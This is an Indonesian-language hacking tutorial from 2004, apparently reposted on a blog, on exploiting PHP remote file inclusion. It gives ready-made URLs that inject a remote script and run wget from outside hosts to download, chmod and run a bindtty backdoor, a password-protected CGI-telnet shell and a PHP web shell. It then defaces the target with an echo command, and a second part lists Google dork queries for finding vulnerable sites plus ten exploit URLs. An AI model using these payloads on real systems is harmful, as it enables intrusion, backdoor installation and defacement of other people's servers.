imageview.php, modules.php, dsb. Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan : I. install bindtty telnet 1.buat url seperti ini: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd “ url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd. 2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd “ 3.eksekusi file httpd tadi : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd “ 4. buka telnet ke IP target sesuai dg port bindttynya II. install Cgi-telnet 1.buat url seperti ini : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl “ url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya. 2. buat cgi-telnet test.pl jadi file eksekusi : ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl “ 3. akses cgitelnet kita dengan membuka url : ” http://www.target.com/cgi-bin/test.pl “ masukkan passwordnya “n0fr13″ III. install shell php 1. buat url seperti ini : “http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php “ url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan “permission denied” cari lah folder lain yang bisa untuk wget shell.php kita. 2. akses shell php kita sesuai dengan foldernya : ” http://www.target.com/target/log.php “ IV. Deface http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo “K-159 and crew was touch your system” > test.html
thats all my friends. just try it !!!
Denpasar, 15 january 2004
K-159
Epilog :special thx to my beloved sister “May” for all the spirit, motivations, love, kindness, and all the fire that u give to me.”I love U my dear sister, in the name of Allah”.
bacaan lebih lanjut:
——————–
www.geocities.com/emilroni/hackurl.txt
www.geocities.com/emilroni/google.txt
=======================
=========================================================================================
Title :SUPER KIDDIES HACKING “Super Bugs PHP II”
Author :K-159
Greetz :KuNTuA, Lieur-Euy, pe_es.
Reference :google.com, membres.lycos.fr, security-corporations.com, security-challenge.com
==========================================================================================
Proof of Concept :
==================
kesalahan url pada fopen ( ) function sehingga attacker bisa menginjeksikan script ke server target.
Target :
========
Temukan target nya di google dengan keyword:
1.allinurl:*.php?page=*
2.allinurl:*.php?content=*
3.allinurl:*.php?file=*
4.allinurl:*.php?filename=*
5.allinurl:*.php?link=*
6.allinurl:*.php?view=*
7.allinurl:*.php?sec=*
8.allinurl:*.php?document=*
9.allinurl:*.php?p=*
10.allinurl:*.php?x=*
Exploit:
==========================================================================================
1.http://www.target.com/target.php?page=http://www.geocities.com/inul_asoy/page.txt
2.http://www.target.com/target.php?content=http://www.geocities.com/inul_asoy/content.txt
3.http://www.target.com/target.php?file=http://www.geocities.com/inul_asoy/file.txt
4.http://www.target.com/target.php?filename=http://www.geocities.com/inul_asoy/filename.txt
5.http://www.target.com/target.php?link=http://www.geocities.com/inul_asoy/link.txt
6.http://www.target.com/target.php?view=http://www.geocities.com/inul_asoy/view.txt
7.http://www.target.com/target.php?sec=http://www.geocities.com/inul_asoy/sec.txt
8.http://www.target.com/target.php?documet=http://www.geocities.com/inul_asoy/_document_._txt
9.http://www.target.com/target.php?p=http://www.geocities.com/inul_asoy/p.txt
10.http://www.target.com/target.php?x=http://www.geocities.com/inul_asoy/x.txt
Details Exploit:
==========================================================================================
Upload a file : upload file ke server target
Explore with fopen() function : mencari target yang mengandung fopen pada server target
Execute arbitrary PHP functions : membuat script php ke dalam server target
Execute a system() command : menjalankan command unix/linux di server target
Manager for SQL Server : mengubah settingan data base sql server target
System overviewer (get the root !) : mengintip system server target dan melakukan lokal root

No comments:

Post a Comment